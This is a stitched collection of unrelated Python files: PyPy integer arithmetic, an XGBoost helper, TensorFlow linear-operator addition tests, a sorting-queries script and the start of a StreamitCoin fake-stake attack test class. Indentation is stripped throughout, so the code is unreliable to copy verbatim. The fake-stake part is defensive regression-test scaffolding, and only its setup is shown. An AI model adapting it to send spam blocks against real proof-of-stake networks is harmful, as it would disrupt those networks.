elif isinstance(w_other, W_SmallLongObject):
result = op(self.longlong, w_other.longlong)
else:
result = bigint_op(self.asbigint(), w_other.asbigint())
return space.newbool(result)
return descr_cmp
descr_lt = _make_descr_cmp('lt')
descr_le = _make_descr_cmp('le')
descr_eq = _make_descr_cmp('eq')
descr_ne = _make_descr_cmp('ne')
descr_gt = _make_descr_cmp('gt')
descr_ge = _make_descr_cmp('ge')
def _make_descr_binop(func, ovf=True):
opname = func.__name__[1:]
descr_name, descr_rname = 'descr_' + opname, 'descr_r' + opname
long_op = getattr(W_LongObject, descr_name)
@func_renamer(descr_name)
def descr_binop(self, space, w_other):
if isinstance(w_other, W_IntObject):
w_other = w_other.as_w_long(space)
elif not isinstance(w_other, W_AbstractLongObject):
return space.w_NotImplemented
elif not isinstance(w_other, W_SmallLongObject):
self = _small2long(space, self)
return long_op(self, space, w_other)
if ovf:
try:
return func(self, space, w_other)
except OverflowError:
self = _small2long(space, self)
w_other = _small2long(space, w_other)
return long_op(self, space, w_other)
else:
return func(self, space, w_other)
if opname in COMMUTATIVE_OPS:
@func_renamer(descr_rname)
def descr_rbinop(self, space, w_other):
return descr_binop(self, space, w_other)
return descr_binop, descr_rbinop
long_rop = getattr(W_LongObject, descr_rname)
@func_renamer(descr_rname)
def descr_rbinop(self, space, w_other):
if isinstance(w_other, W_IntObject):
w_other = w_other.as_w_long(space)
elif not isinstance(w_other, W_AbstractLongObject):
return space.w_NotImplemented
elif not isinstance(w_other, W_SmallLongObject):
self = _small2long(space, self)
return long_rop(self, space, w_other)
if ovf:
try:
return func(w_other, space, self)
except OverflowError:
self = _small2long(space, self)
w_other = _small2long(space, w_other)
return long_rop(self, space, w_other)
else:
return func(w_other, space, self)
return descr_binop, descr_rbinop
def _add(self, space, w_other):
x = self.longlong
y = w_other.longlong
z = x + y
if ((z ^ x) & (z ^ y)) < 0:
raise OverflowError
return W_SmallLongObject(z)
descr_add, descr_radd = _make_descr_binop(_add)
def _sub(self, space, w_other):
x = self.longlong
y = w_other.longlong
z = x - y
if ((z ^ x) & (z ^ ~y)) < 0:
raise OverflowError
return W_SmallLongObject(z)
descr_sub, descr_rsub = _make_descr_binop(_sub)
def _mul(self, space, w_other):
x = self.longlong
y = w_other.longlong
z = _llong_mul_ovf(x, y)
return W_SmallLongObject(z)
descr_mul, descr_rmul = _make_descr_binop(_mul)
def _floordiv(self, space, w_other):
x = self.longlong
y = w_other.longlong
try:
if y == -1 and x == r_longlong(-1 << (LONGLONG_BIT-1)):
raise OverflowError
z = x // y
except ZeroDivisionError:
raise oefmt(space.w_ZeroDivisionError, "integer division by zero")
return W_SmallLongObject(z)
descr_floordiv, descr_rfloordiv = _make_descr_binop(_floordiv)
def _mod(self, space, w_other):
x = self.longlong
y = w_other.longlong
try:
if y == -1 and x == r_longlong(-1 << (LONGLONG_BIT-1)):
raise OverflowError
z = x % y
except ZeroDivisionError:
raise oefmt(space.w_ZeroDivisionError, "integer modulo by zero")
return W_SmallLongObject(z)
descr_mod, descr_rmod = _make_descr_binop(_mod)
def _divmod(self, space, w_other):
x = self.longlong
y = w_other.longlong
try:
if y == -1 and x == r_longlong(-1 << (LONGLONG_BIT-1)):
raise OverflowError
z = x // y
except ZeroDivisionError:
raise oefmt(space.w_ZeroDivisionError, "integer divmod by zero")
# no overflow possible
m = x % y
return space.newtuple([W_SmallLongObject(z), W_SmallLongObject(m)])
descr_divmod, descr_rdivmod = _make_descr_binop(_divmod)
def _lshift(self, space, w_other):
a = self.longlong
# May overflow
b = space.int_w(w_other)
if r_uint(b) < LONGLONG_BIT: # 0 <= b < LONGLONG_BIT
c = a << b
if a != (c >> b):
raise OverflowError
return W_SmallLongObject(c)
if b < 0:
raise oefmt(space.w_ValueError, "negative shift count")
# b >= LONGLONG_BIT
if a == 0:
return self
raise OverflowError
descr_lshift, descr_rlshift = _make_descr_binop(_lshift)
def _rshift(self, space, w_other):
a = self.longlong
# May overflow
b = space.int_w(w_other)
if r_uint(b) >= LONGLONG_BIT: # not (0 <= b < LONGLONG_BIT)
if b < 0:
raise oefmt(space.w_ValueError, "negative shift count")
# b >= LONGLONG_BIT
if a == 0:
return self
a = -1 if a < 0 else 0
else:
a = a >> b
return W_SmallLongObject(a)
descr_rshift, descr_rrshift = _make_descr_binop(_rshift, ovf=False)
def _and(self, space, w_other):
a = self.longlong
b = w_other.longlong
res = a & b
return W_SmallLongObject(res)
descr_and, descr_rand = _make_descr_binop(_and, ovf=False)
def _or(self, space, w_other):
a = self.longlong
b = w_other.longlong
res = a | b
return W_SmallLongObject(res)
descr_or, descr_ror = _make_descr_binop(_or, ovf=False)
def _xor(self, space, w_other):
a = self.longlong
b = w_other.longlong
res = a ^ b
return W_SmallLongObject(res)
descr_xor, descr_rxor = _make_descr_binop(_xor, ovf=False)
def _llong_mul_ovf(a, b):
# xxx duplication of the logic from translator/c/src/int.h
longprod = a * b
doubleprod = float(a) * float(b)
doubled_longprod = float(longprod)
# Fast path for normal case: small multiplicands, and no info
# is lost in either method.
if doubled_longprod == doubleprod:
return longprod
# Somebody somewhere lost info. Close enough, or way off? Note
# that a != 0 and b != 0 (else doubled_longprod == doubleprod == 0).
# The difference either is or isn't significant compared to the
# true value (of which doubleprod is a good approximation).
diff = doubled_longprod - doubleprod
absdiff = abs(diff)
absprod = abs(doubleprod)
# absdiff/absprod <= 1/32 iff
# 32 * absdiff <= absprod -- 5 good bits is "close enough"
if 32.0 * absdiff <= absprod:
return longprod
raise OverflowError("integer multiplication")
def _small2long(space, w_small):
return W_LongObject(w_small.asbigint())
def _pow(space, iv, iw, iz):
if iw < 0:
if iz != 0:
raise oefmt(space.w_ValueError,
"pow() 2nd argument cannot be negative when 3rd "
"argument specified")
raise ValueError
temp = iv
ix = r_longlong(1)
while iw > 0:
if iw & 1:
ix = _llong_mul_ovf(ix, temp)
iw >>= 1 # Shift exponent down by 1 bit
if iw == 0:
break
temp = _llong_mul_ovf(temp, temp) # Square the value of temp
if iz:
# If we did a multiplication, perform a modulo
ix %= iz
temp %= iz
if iz:
ix %= iz
return W_SmallLongObject(ix)
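# Worked example of the square-and-multiply loop above (illustrative only):
# for iv=3, iw=5 (binary 101), iz=0 the loop does
#   bit 1: ix = 1*3 = 3,    temp = 3*3 = 9
#   bit 0: ix unchanged,    temp = 9*9 = 81
#   bit 1: ix = 3*81 = 243, then the loop breaks, so _pow returns 3**5 = 243.
# Every multiplication goes through _llong_mul_ovf, so an overflow propagates up
# and the callers fall back to the arbitrary-precision long implementation.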
|
py | 1a40b3ac659dd1452bc41bfaf6b76afca045c606 | import pickle
import scipy.stats as st
from sklearn.model_selection import RandomizedSearchCV
from sklearn.metrics import auc
from sklearn.model_selection import StratifiedKFold
import xgboost as xgb
from sklearn.model_selection import KFold
from sklearn.metrics import matthews_corrcoef,make_scorer
def train_xgb(X,
y,
mod_number=1,
cv=None,
outfile="model.pickle",
n_iter_search=100,
nfolds=20,
random_state=42):
"""
Train an XGBoost model with hyper parameter optimization.
Parameters
----------
X : matrix
Matrix with all the features, every instance should be coupled to the y-value
y : vector
Vector with the class, every value should be coupled to an x-vector with features
Returns
-------
    float
        Best cross-validated ROC AUC score of the fitted RandomizedSearchCV;
        the fitted search object itself is pickled to ``outfile``.
"""
xgb_handle = xgb.XGBClassifier()
one_to_left = st.beta(10, 1)
from_zero_positive = st.expon(0, 50)
#Define distributions to sample from for hyper parameter optimization
param_dist = {
"n_estimators": st.randint(25, 150),
"max_depth": st.randint(5, 10),
"learning_rate": st.uniform(0.05, 0.4),
#"colsample_bytree": one_to_left,
"subsample": one_to_left,
"gamma": st.uniform(0, 10),
"reg_alpha": from_zero_positive,
"min_child_weight": from_zero_positive,
}
if not cv: cv = KFold(n_splits=nfolds, shuffle=True,random_state=random_state)
mcc = make_scorer(matthews_corrcoef)
random_search = RandomizedSearchCV(xgb_handle, param_distributions=param_dist,
n_iter=n_iter_search,verbose=10,scoring="roc_auc",
n_jobs=1,refit=True,cv=cv)
random_search.fit(X, y)
random_search.feats = X.columns
pickle.dump(random_search,open(outfile,"wb"))
return(random_search.best_score_) |
py | 1a40b453ac2ed4f0ff09b2ec05b2f2c0390072df | from typing import Dict
from server.packets.packet import Packet
class PlayerDiedPacket(Packet):
def __init__(self, player_id: str):
self.player_id = player_id
def encode(self) -> Dict:
packet = super().encode()
packet['player_id'] = self.player_id
return packet
@staticmethod
def decode(data: Dict):
return PlayerDiedPacket(
player_id=data['player_id']
)
@staticmethod
def get_type() -> str:
return "player_died"
|
py | 1a40b4659a3d039f4c459fedb598b2ce6e1db1af | #!/usr/bin/env python
# -*- encoding: utf-8 -*-
# Copyright 2016 - Twitter, Inc.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
'''context.py: module for defining context'''
from abc import abstractmethod
class Context(object):
"""Context is the information available at runtime for operators like transform.
It contains basic things like config, runtime information like task,
the stream that it is operating on, ProcessState, etc.
"""
@abstractmethod
def get_task_id(self):
"""Fetches the task id of the current instance of the operator
"""
pass
@abstractmethod
def get_config(self):
"""Fetches the config of the computation
"""
pass
@abstractmethod
def get_stream_name(self):
"""Fetches the stream name that we are operating on
"""
pass
@abstractmethod
def get_num_partitions(self):
"""Fetches the number of partitions of the stream we are operating on
"""
pass
    @abstractmethod
    def get_partition_index(self):
"""Fetches the partition of the stream that we are operating on
"""
pass
@abstractmethod
def get_state(self):
"""The state where components can store any of their local state
"""
pass
@abstractmethod
def emit(self, values):
"""Emits the values in the output stream
"""
pass
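# A minimal concrete sketch (hypothetical, for tests or local runs only; a real
# Context is supplied by the runtime):
#
#   class LocalContext(Context):
#       def __init__(self, task_id, config, stream_name):
#           self._task_id, self._config, self._stream = task_id, config, stream_name
#           self._state, self.emitted = {}, []
#       def get_task_id(self): return self._task_id
#       def get_config(self): return self._config
#       def get_stream_name(self): return self._stream
#       def get_num_partitions(self): return 1
#       def get_partition_index(self): return 0
#       def get_state(self): return self._state
#       def emit(self, values): self.emitted.append(values)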
|
py | 1a40b5658c415a53d51bacd47769b719b9e59e90 | # Problem statement: Consider an array a of n integers. We perform q queries; each
# query (l, r) sorts all the elements in the subsegment a[l..r] (inclusive).
# Given k, find and print the value at index k (where 0 <= k < n) after performing all q queries.
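# Worked example (illustrative): for a = [4, 3, 2, 1], queries (0, 2) then (1, 3)
# and k = 1, the array evolves
#   [4, 3, 2, 1] -> sort a[0..2] -> [2, 3, 4, 1] -> sort a[1..3] -> [2, 1, 3, 4]
# so the program prints 1.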
import sys
##### Read Data
dat = [x.split() for x in sys.stdin.readlines()]
N = int(dat[0][0])
Q = int(dat[0][1])
k = int(dat[0][2])
a = list(map(int, dat[1]))
q = [list(map(int, x)) for x in dat[2:len(dat)]]
##### Process Queries
b = sorted(a)
lmin, rmax, pmax, qmin = (N-1), 0, 0, (N-1)
pmin, qmax, flag = (N-1), 0, 1
count, span_q, ladder, revlad = [], 0, 0, 0
if Q >= 2:
ladder = all(q[i+1][0] > q[i][0] for i in range(Q-1))
revlad = all(q[i+1][1] < q[i][1] for i in range(Q-1))
if a != b and ladder < 1 and revlad < 1:
for i in range(Q):
l, r = q[i][0], q[i][1]
if (r-l) > (rmax-lmin):
lmin, rmax = l, r
if l < pmin:
pmin, pmax = l, r
elif l == pmin and pmax < r:
pmax = r
if r > qmax:
qmin, qmax = l, r
elif r == qmax and qmin > l:
qmin = l
for i in range(Q):
l, r = q[i][0], q[i][1]
if l > lmin and r < rmax: continue
if l > pmin and r < pmax: continue
if l > qmin and r < qmax: continue
if i < (Q-1):
if l >= q[i+1][0] and r <= q[i+1][1]:
continue
if i > 0:
if l >= q[i-flag][0] and r <= q[i-flag][1]:
flag += 1
continue
else:
flag = 1
count += [i]
span_q += r-l+1
# Perform Queries
if ladder > 0:
l, r, Qu = q[0][0], q[0][1], int((k+5)/5)
a[l:r+1] = sorted(a[l:r+1])
for i in range(1, Q):
l, r, r0, m, sig = q[i][0], q[i][1], q[i-1][1], 0, 0
if l > r0 or (r-r0) > 0.1*(r0-l):
a[l:r+1] = sorted(a[l:r+1])
continue
if k < l: break
count = list(range(r0+1, r+1))
for j in range(len(count)):
p, new_A = count[j], a[count[j]]
l, r0 = q[i][0], q[i-1][1]
if a[l] >= new_A:
del(a[p]); a[l:l] = [new_A]; continue
elif a[r0+j-1] <= new_A:
del(a[p]); a[r0+j:r0+j] = [new_A]; continue
while sig < 1:
m = int((l+r0)/2)
if a[m] > new_A:
r0 = m
elif a[m+1] < new_A:
l = m+1
else:
del(a[p]); a[m+1:m+1] = [new_A]
sig = 1
elif revlad > 0:
l, r, Qu = q[0][0], q[0][1], int((k+5)/5)
a[l:r+1] = sorted(a[l:r+1])
for i in range(1, Q):
l, r, l0, m, sig = q[i][0], q[i][1], q[i-1][0], 0, 0
if k > r: break
if r < l0:
a[l:r+1] = sorted(a[l:r+1]); continue
count = list(range(l, l0))
for j in range(len(count)):
p, new_A = count[j], a[count[j]]
if a[l0] >= new_A:
del(a[p]); a[l0:l0] = [new_A]; continue
elif a[r] <= new_A:
del(a[p]); a[r:r] = [new_A]; continue
while sig < 1:
m = int((l0+r)/2)
if a[m] > new_A:
r = m
elif a[m+1] < new_A:
l0 = m+1
else:
del(a[p]); a[m+1:m+1] = [new_A]
sig = 1
elif span_q < 1e9 and a != b:
for i in count:
l, r = q[i][0], q[i][1]
a[l:(r+1)] = sorted(a[l:(r+1)])
else:
a[pmin:qmax+1] = sorted(a[pmin:qmax+1])
print(a[k])
|
py | 1a40b5ca3baf70bb4f02faf632365f286d73e2cf | # Copyright 2016 The TensorFlow Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ==============================================================================
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import numpy as np
from tensorflow.python.framework import test_util
from tensorflow.python.ops import linalg_ops
from tensorflow.python.ops.linalg import linalg as linalg_lib
from tensorflow.python.ops.linalg import linear_operator_addition
from tensorflow.python.platform import test
linalg = linalg_lib
rng = np.random.RandomState(0)
add_operators = linear_operator_addition.add_operators
# pylint: disable=unused-argument
class _BadAdder(linear_operator_addition._Adder):
"""Adder that will fail if used."""
def can_add(self, op1, op2):
raise AssertionError("BadAdder.can_add called!")
def _add(self, op1, op2, operator_name, hints):
raise AssertionError("This line should not be reached")
# pylint: enable=unused-argument
class LinearOperatorAdditionCorrectnessTest(test.TestCase):
"""Tests correctness of addition with combinations of a few Adders.
Tests here are done with the _DEFAULT_ADDITION_TIERS, which means
add_operators should reduce all operators resulting in one single operator.
This shows that we are able to correctly combine adders using the tiered
system. All Adders should be tested separately, and there is no need to test
every Adder within this class.
"""
def test_one_operator_is_returned_unchanged(self):
op_a = linalg.LinearOperatorDiag([1., 1.])
op_sum = add_operators([op_a])
self.assertEqual(1, len(op_sum))
self.assertIs(op_sum[0], op_a)
def test_at_least_one_operators_required(self):
with self.assertRaisesRegex(ValueError, "must contain at least one"):
add_operators([])
def test_attempting_to_add_numbers_raises(self):
with self.assertRaisesRegex(TypeError, "contain only LinearOperator"):
add_operators([1, 2])
@test_util.run_deprecated_v1
def test_two_diag_operators(self):
op_a = linalg.LinearOperatorDiag(
[1., 1.], is_positive_definite=True, name="A")
op_b = linalg.LinearOperatorDiag(
[2., 2.], is_positive_definite=True, name="B")
with self.cached_session():
op_sum = add_operators([op_a, op_b])
self.assertEqual(1, len(op_sum))
op = op_sum[0]
self.assertIsInstance(op, linalg_lib.LinearOperatorDiag)
self.assertAllClose([[3., 0.], [0., 3.]], op.to_dense())
# Adding positive definite operators produces positive def.
self.assertTrue(op.is_positive_definite)
# Real diagonal ==> self-adjoint.
self.assertTrue(op.is_self_adjoint)
# Positive definite ==> non-singular
self.assertTrue(op.is_non_singular)
# Enforce particular name for this simple case
self.assertEqual("Add/B__A/", op.name)
@test_util.run_deprecated_v1
def test_three_diag_operators(self):
op1 = linalg.LinearOperatorDiag(
[1., 1.], is_positive_definite=True, name="op1")
op2 = linalg.LinearOperatorDiag(
[2., 2.], is_positive_definite=True, name="op2")
op3 = linalg.LinearOperatorDiag(
[3., 3.], is_positive_definite=True, name="op3")
with self.cached_session():
op_sum = add_operators([op1, op2, op3])
self.assertEqual(1, len(op_sum))
op = op_sum[0]
self.assertTrue(isinstance(op, linalg_lib.LinearOperatorDiag))
self.assertAllClose([[6., 0.], [0., 6.]], op.to_dense())
# Adding positive definite operators produces positive def.
self.assertTrue(op.is_positive_definite)
# Real diagonal ==> self-adjoint.
self.assertTrue(op.is_self_adjoint)
# Positive definite ==> non-singular
self.assertTrue(op.is_non_singular)
@test_util.run_deprecated_v1
def test_diag_tril_diag(self):
op1 = linalg.LinearOperatorDiag(
[1., 1.], is_non_singular=True, name="diag_a")
op2 = linalg.LinearOperatorLowerTriangular(
[[2., 0.], [0., 2.]],
is_self_adjoint=True,
is_non_singular=True,
name="tril")
op3 = linalg.LinearOperatorDiag(
[3., 3.], is_non_singular=True, name="diag_b")
with self.cached_session():
op_sum = add_operators([op1, op2, op3])
self.assertEqual(1, len(op_sum))
op = op_sum[0]
self.assertIsInstance(op, linalg_lib.LinearOperatorLowerTriangular)
self.assertAllClose([[6., 0.], [0., 6.]], op.to_dense())
# The diag operators will be self-adjoint (because real and diagonal).
# The TriL operator has the self-adjoint hint set.
self.assertTrue(op.is_self_adjoint)
# Even though op1/2/3 are non-singular, this does not imply op is.
# Since no custom hint was provided, we default to None (unknown).
self.assertEqual(None, op.is_non_singular)
@test_util.run_deprecated_v1
def test_matrix_diag_tril_diag_uses_custom_name(self):
op0 = linalg.LinearOperatorFullMatrix(
[[-1., -1.], [-1., -1.]], name="matrix")
op1 = linalg.LinearOperatorDiag([1., 1.], name="diag_a")
op2 = linalg.LinearOperatorLowerTriangular(
[[2., 0.], [1.5, 2.]], name="tril")
op3 = linalg.LinearOperatorDiag([3., 3.], name="diag_b")
with self.cached_session():
op_sum = add_operators([op0, op1, op2, op3], operator_name="my_operator")
self.assertEqual(1, len(op_sum))
op = op_sum[0]
self.assertIsInstance(op, linalg_lib.LinearOperatorFullMatrix)
self.assertAllClose([[5., -1.], [0.5, 5.]], op.to_dense())
self.assertEqual("my_operator", op.name)
def test_incompatible_domain_dimensions_raises(self):
op1 = linalg.LinearOperatorFullMatrix(rng.rand(2, 3))
op2 = linalg.LinearOperatorDiag(rng.rand(2, 4))
with self.assertRaisesRegex(ValueError, "must.*same `domain_dimension`"):
add_operators([op1, op2])
def test_incompatible_range_dimensions_raises(self):
op1 = linalg.LinearOperatorFullMatrix(rng.rand(2, 3))
op2 = linalg.LinearOperatorDiag(rng.rand(3, 3))
with self.assertRaisesRegex(ValueError, "must.*same `range_dimension`"):
add_operators([op1, op2])
def test_non_broadcastable_batch_shape_raises(self):
op1 = linalg.LinearOperatorFullMatrix(rng.rand(2, 3, 3))
op2 = linalg.LinearOperatorDiag(rng.rand(4, 3, 3))
with self.assertRaisesRegex(ValueError, "Incompatible shapes"):
add_operators([op1, op2])
class LinearOperatorOrderOfAdditionTest(test.TestCase):
"""Test that the order of addition is done as specified by tiers."""
def test_tier_0_additions_done_in_tier_0(self):
diag1 = linalg.LinearOperatorDiag([1.])
diag2 = linalg.LinearOperatorDiag([1.])
diag3 = linalg.LinearOperatorDiag([1.])
addition_tiers = [
[linear_operator_addition._AddAndReturnDiag()],
[_BadAdder()],
]
# Should not raise since all were added in tier 0, and tier 1 (with the
# _BadAdder) was never reached.
op_sum = add_operators([diag1, diag2, diag3], addition_tiers=addition_tiers)
self.assertEqual(1, len(op_sum))
self.assertIsInstance(op_sum[0], linalg.LinearOperatorDiag)
def test_tier_1_additions_done_by_tier_1(self):
diag1 = linalg.LinearOperatorDiag([1.])
diag2 = linalg.LinearOperatorDiag([1.])
tril = linalg.LinearOperatorLowerTriangular([[1.]])
addition_tiers = [
[linear_operator_addition._AddAndReturnDiag()],
[linear_operator_addition._AddAndReturnTriL()],
[_BadAdder()],
]
# Should not raise since all were added by tier 1, and the
# _BadAdder) was never reached.
op_sum = add_operators([diag1, diag2, tril], addition_tiers=addition_tiers)
self.assertEqual(1, len(op_sum))
self.assertIsInstance(op_sum[0], linalg.LinearOperatorLowerTriangular)
def test_tier_1_additions_done_by_tier_1_with_order_flipped(self):
diag1 = linalg.LinearOperatorDiag([1.])
diag2 = linalg.LinearOperatorDiag([1.])
tril = linalg.LinearOperatorLowerTriangular([[1.]])
addition_tiers = [
[linear_operator_addition._AddAndReturnTriL()],
[linear_operator_addition._AddAndReturnDiag()],
[_BadAdder()],
]
# Tier 0 could convert to TriL, and this converted everything to TriL,
# including the Diags.
# Tier 1 was never used.
# Tier 2 was never used (therefore, _BadAdder didn't raise).
op_sum = add_operators([diag1, diag2, tril], addition_tiers=addition_tiers)
self.assertEqual(1, len(op_sum))
self.assertIsInstance(op_sum[0], linalg.LinearOperatorLowerTriangular)
@test_util.run_deprecated_v1
def test_cannot_add_everything_so_return_more_than_one_operator(self):
diag1 = linalg.LinearOperatorDiag([1.])
diag2 = linalg.LinearOperatorDiag([2.])
tril5 = linalg.LinearOperatorLowerTriangular([[5.]])
addition_tiers = [
[linear_operator_addition._AddAndReturnDiag()],
]
# Tier 0 (the only tier) can only convert to Diag, so it combines the two
# diags, but the TriL is unchanged.
# Result should contain two operators, one Diag, one TriL.
op_sum = add_operators([diag1, diag2, tril5], addition_tiers=addition_tiers)
self.assertEqual(2, len(op_sum))
found_diag = False
found_tril = False
with self.cached_session():
for op in op_sum:
if isinstance(op, linalg.LinearOperatorDiag):
found_diag = True
self.assertAllClose([[3.]], op.to_dense())
if isinstance(op, linalg.LinearOperatorLowerTriangular):
found_tril = True
self.assertAllClose([[5.]], op.to_dense())
self.assertTrue(found_diag and found_tril)
def test_intermediate_tier_is_not_skipped(self):
diag1 = linalg.LinearOperatorDiag([1.])
diag2 = linalg.LinearOperatorDiag([1.])
tril = linalg.LinearOperatorLowerTriangular([[1.]])
addition_tiers = [
[linear_operator_addition._AddAndReturnDiag()],
[_BadAdder()],
[linear_operator_addition._AddAndReturnTriL()],
]
# tril cannot be added in tier 0, and the intermediate tier 1 with the
# BadAdder will catch it and raise.
with self.assertRaisesRegex(AssertionError, "BadAdder.can_add called"):
add_operators([diag1, diag2, tril], addition_tiers=addition_tiers)
class AddAndReturnScaledIdentityTest(test.TestCase):
def setUp(self):
self._adder = linear_operator_addition._AddAndReturnScaledIdentity()
@test_util.run_deprecated_v1
def test_identity_plus_identity(self):
id1 = linalg.LinearOperatorIdentity(num_rows=2)
id2 = linalg.LinearOperatorIdentity(num_rows=2, batch_shape=[3])
hints = linear_operator_addition._Hints(
is_positive_definite=True, is_non_singular=True)
self.assertTrue(self._adder.can_add(id1, id2))
operator = self._adder.add(id1, id2, "my_operator", hints)
self.assertIsInstance(operator, linalg.LinearOperatorScaledIdentity)
with self.cached_session():
self.assertAllClose(2 * linalg_ops.eye(num_rows=2, batch_shape=[3]),
operator.to_dense())
self.assertTrue(operator.is_positive_definite)
self.assertTrue(operator.is_non_singular)
self.assertEqual("my_operator", operator.name)
@test_util.run_deprecated_v1
def test_identity_plus_scaled_identity(self):
id1 = linalg.LinearOperatorIdentity(num_rows=2, batch_shape=[3])
id2 = linalg.LinearOperatorScaledIdentity(num_rows=2, multiplier=2.2)
hints = linear_operator_addition._Hints(
is_positive_definite=True, is_non_singular=True)
self.assertTrue(self._adder.can_add(id1, id2))
operator = self._adder.add(id1, id2, "my_operator", hints)
self.assertIsInstance(operator, linalg.LinearOperatorScaledIdentity)
with self.cached_session():
self.assertAllClose(3.2 * linalg_ops.eye(num_rows=2, batch_shape=[3]),
operator.to_dense())
self.assertTrue(operator.is_positive_definite)
self.assertTrue(operator.is_non_singular)
self.assertEqual("my_operator", operator.name)
@test_util.run_deprecated_v1
def test_scaled_identity_plus_scaled_identity(self):
id1 = linalg.LinearOperatorScaledIdentity(
num_rows=2, multiplier=[2.2, 2.2, 2.2])
id2 = linalg.LinearOperatorScaledIdentity(num_rows=2, multiplier=-1.0)
hints = linear_operator_addition._Hints(
is_positive_definite=True, is_non_singular=True)
self.assertTrue(self._adder.can_add(id1, id2))
operator = self._adder.add(id1, id2, "my_operator", hints)
self.assertIsInstance(operator, linalg.LinearOperatorScaledIdentity)
with self.cached_session():
self.assertAllClose(1.2 * linalg_ops.eye(num_rows=2, batch_shape=[3]),
operator.to_dense())
self.assertTrue(operator.is_positive_definite)
self.assertTrue(operator.is_non_singular)
self.assertEqual("my_operator", operator.name)
class AddAndReturnDiagTest(test.TestCase):
def setUp(self):
self._adder = linear_operator_addition._AddAndReturnDiag()
@test_util.run_deprecated_v1
def test_identity_plus_identity_returns_diag(self):
id1 = linalg.LinearOperatorIdentity(num_rows=2)
id2 = linalg.LinearOperatorIdentity(num_rows=2, batch_shape=[3])
hints = linear_operator_addition._Hints(
is_positive_definite=True, is_non_singular=True)
self.assertTrue(self._adder.can_add(id1, id2))
operator = self._adder.add(id1, id2, "my_operator", hints)
self.assertIsInstance(operator, linalg.LinearOperatorDiag)
with self.cached_session():
self.assertAllClose(2 * linalg_ops.eye(num_rows=2, batch_shape=[3]),
operator.to_dense())
self.assertTrue(operator.is_positive_definite)
self.assertTrue(operator.is_non_singular)
self.assertEqual("my_operator", operator.name)
@test_util.run_deprecated_v1
def test_diag_plus_diag(self):
diag1 = rng.rand(2, 3, 4)
diag2 = rng.rand(4)
op1 = linalg.LinearOperatorDiag(diag1)
op2 = linalg.LinearOperatorDiag(diag2)
hints = linear_operator_addition._Hints(
is_positive_definite=True, is_non_singular=True)
self.assertTrue(self._adder.can_add(op1, op2))
operator = self._adder.add(op1, op2, "my_operator", hints)
self.assertIsInstance(operator, linalg.LinearOperatorDiag)
with self.cached_session():
self.assertAllClose(
linalg.LinearOperatorDiag(diag1 + diag2).to_dense(),
operator.to_dense())
self.assertTrue(operator.is_positive_definite)
self.assertTrue(operator.is_non_singular)
self.assertEqual("my_operator", operator.name)
class AddAndReturnTriLTest(test.TestCase):
def setUp(self):
self._adder = linear_operator_addition._AddAndReturnTriL()
@test_util.run_deprecated_v1
def test_diag_plus_tril(self):
diag = linalg.LinearOperatorDiag([1., 2.])
tril = linalg.LinearOperatorLowerTriangular([[10., 0.], [30., 0.]])
hints = linear_operator_addition._Hints(
is_positive_definite=True, is_non_singular=True)
self.assertTrue(self._adder.can_add(diag, diag))
self.assertTrue(self._adder.can_add(diag, tril))
operator = self._adder.add(diag, tril, "my_operator", hints)
self.assertIsInstance(operator, linalg.LinearOperatorLowerTriangular)
with self.cached_session():
self.assertAllClose([[11., 0.], [30., 2.]], operator.to_dense())
self.assertTrue(operator.is_positive_definite)
self.assertTrue(operator.is_non_singular)
self.assertEqual("my_operator", operator.name)
class AddAndReturnMatrixTest(test.TestCase):
def setUp(self):
self._adder = linear_operator_addition._AddAndReturnMatrix()
@test_util.run_deprecated_v1
def test_diag_plus_diag(self):
diag1 = linalg.LinearOperatorDiag([1., 2.])
diag2 = linalg.LinearOperatorDiag([-1., 3.])
hints = linear_operator_addition._Hints(
is_positive_definite=False, is_non_singular=False)
self.assertTrue(self._adder.can_add(diag1, diag2))
operator = self._adder.add(diag1, diag2, "my_operator", hints)
self.assertIsInstance(operator, linalg.LinearOperatorFullMatrix)
with self.cached_session():
self.assertAllClose([[0., 0.], [0., 5.]], operator.to_dense())
self.assertFalse(operator.is_positive_definite)
self.assertFalse(operator.is_non_singular)
self.assertEqual("my_operator", operator.name)
if __name__ == "__main__":
test.main()
|
py | 1a40b7f64814cbd6b122b234700dde5335e7e97c | #!/usr/bin/env python3
# -*- coding: utf-8 -*-
from io import BytesIO
from struct import pack
from random import randint, choice
import time
from test_framework.authproxy import JSONRPCException
from test_framework.blocktools import create_coinbase, create_block
from test_framework.key import CECKey
from test_framework.messages import CTransaction, CTxOut, CTxIn, COIN, msg_block
from test_framework.mininode import network_thread_start
from test_framework.test_framework import BitcoinTestFramework
from test_framework.script import CScript, OP_CHECKSIG
from test_framework.util import hash256, bytes_to_hex_str, hex_str_to_bytes, connect_nodes_bi, p2p_port
from .util import TestNode, create_transaction, utxo_to_stakingPrevOuts, dir_size
''' -------------------------------------------------------------------------
StreamitCoin_FakeStakeTest CLASS ----------------------------------------------------
General Test Class to be extended by individual tests for each attack test
'''
class StreamitCoin_FakeStakeTest(BitcoinTestFramework):
def set_test_params(self):
''' Setup test environment
:param:
:return:
'''
self.setup_clean_chain = True
self.num_nodes = 1
self.extra_args = [['-staking=1', '-debug=net']]*self.num_nodes
def setup_network(self):
''' Can't rely on syncing all the nodes when staking=1
:param:
:return:
'''
self.setup_nodes()
for i in range(self.num_nodes - 1):
for j in range(i+1, self.num_nodes):
connect_nodes_bi(self.nodes, i, j)
def init_test(self):
''' Initializes test parameters
:param:
:return:
'''
self.log.info("\n\n*** Starting %s ***\n------------------------\n%s\n", self.__class__.__name__, self.description)
# Global Test parameters (override in run_test)
self.DEFAULT_FEE = 0.1
# Spam blocks to send in current test
self.NUM_BLOCKS = 30
# Setup the p2p connections and start up the network thread.
self.test_nodes = []
for i in range(self.num_nodes):
self.test_nodes.append(TestNode())
